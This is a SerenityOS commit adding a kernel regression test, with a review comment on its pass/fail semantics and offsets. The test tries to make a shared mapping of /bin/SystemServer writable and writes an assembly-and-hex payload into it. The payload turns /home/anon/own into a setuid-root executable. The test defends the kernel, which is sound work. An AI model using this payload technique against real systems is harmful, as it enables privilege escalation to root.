author | Brian Gianforcaro <bgianf@serenityos.org> | 2021-05-06 01:14:50 -0700 |
---|---|---|
committer | Andreas Kling <kling@serenityos.org> | 2021-05-06 17:54:28 +0200 |
commit | fd0dbd1ebfbcbc29d46393061daa49dc7390caa7 (patch) | |
tree | 278ea94a46900e47ff7dae46b1017cd31095971a /Tests/Kernel/mmap-write-into-running-programs-executable-file.cpp | |
parent | 6e641fadfa61d4b890db52fb60cc3709352336b6 (diff) | |
download | serenity-fd0dbd1ebfbcbc29d46393061daa49dc7390caa7.zip |
Tests: Establish root Tests directory, move Userland/Tests there
With the goal of centralizing all tests in the system, this is a
first step to establish a Tests sub-tree. It will contain all of
the unit tests and test harnesses for the various components in the
system.
Diffstat (limited to 'Tests/Kernel/mmap-write-into-running-programs-executable-file.cpp')
-rw-r--r-- | Tests/Kernel/mmap-write-into-running-programs-executable-file.cpp | 76 |
1 files changed, 76 insertions, 0 deletions
diff --git a/Tests/Kernel/mmap-write-into-running-programs-executable-file.cpp b/Tests/Kernel/mmap-write-into-running-programs-executable-file.cpp
new file mode 100644
index 0000000000..757710b569
--- /dev/null
+++ b/Tests/Kernel/mmap-write-into-running-programs-executable-file.cpp
@@ -0,0 +1,76 @@
+/*
+ * Copyright (c) 2018-2020, the SerenityOS developers.
+ *
+ * SPDX-License-Identifier: BSD-2-Clause
+ */
+
+#include <AK/Types.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <unistd.h>
+
+int main()
+{
+ int fd = open("/bin/SystemServer", O_RDONLY);
+ if (fd < 0) {
+ perror("open");
+ return 1;
+ }
+ u8* ptr = (u8*)mmap(nullptr, 16384, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
+ if (ptr == MAP_FAILED) {
+ perror("mmap");
+ return 1;
+ }
+
+ if (mprotect(ptr, 16384, PROT_READ | PROT_WRITE) < 0) {
+ perror("mprotect");
+ return 1;
+ }
+
+ /*
+ *
+ * This payload replaces the start of sigchld_handler in the /bin/SystemServer file.
+ * It does two things:
+ *
+ * chown ("/home/anon/own", 0, 0);
+ * chmod ("/home/anon/own", 04755);
+ *
+ * In other words, it turns "/home/anon/own" into a SUID-root executable! :^)
+ *
+ */
+
+#if 0
+ [bits 32]
+ [org 0x0804b111]
+ jmp $+17
+ path:
+ db "/home/anon/own", 0
+ mov eax, 79
+ mov edx, path
+ mov ecx, 0
+ mov ebx, 0
+ int 0x82
+ mov eax, 67
+ mov edx, path
+ mov ecx, 15
+ mov ebx, 2541
+ int 0x82
+ ret
+#endif
+
+ const u8 payload[] = {
+ 0xeb, 0x0f, 0x2f, 0x68, 0x6f, 0x6d, 0x65, 0x2f, 0x61, 0x6e, 0x6f,
+ 0x6e, 0x2f, 0x6f, 0x77, 0x6e, 0x00, 0xb8, 0x4f, 0x00, 0x00, 0x00,
+ 0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xbb,
+ 0x00, 0x00, 0x00, 0x00, 0xcd, 0x82, 0xb8, 0x43, 0x00, 0x00, 0x00,
+ 0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x0f, 0x00, 0x00, 0x00, 0xbb,
+ 0xed, 0x09, 0x00, 0x00, 0xcd, 0x82, 0xc3
+ };
+
+ memcpy(&ptr[0x3111], payload, sizeof(payload));
+
+ printf("ok\n");
+ return 0;
+}
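Review bot: The pass/fail semantics of this test are undocumented: the `mprotect` failure branch returns 1, yet that is presumably the expected (correct-kernel) outcome, while the `printf("ok\n")` path is only reached if the kernel let a `MAP_SHARED` mapping of a running executable become writable — so a reader or harness cannot tell which exit status means the kernel behaved correctly. A header comment above `main` such as `// Expected: mprotect() on the shared mapping must fail; reaching the memcpy means the kernel allowed writes into a running program's executable file.` would make the contract explicit. The magic values `16384` and `0x3111` are also unexplained; the offset appears to equal `[org 0x0804b111]` minus a 0x08048000 load base, which is worth stating next to the `memcpy` as an assumption to confirm, e.g. `// 0x3111: presumed file offset of sigchld_handler (0x0804b111 - 0x08048000, see asm above) — verify against the current binary`.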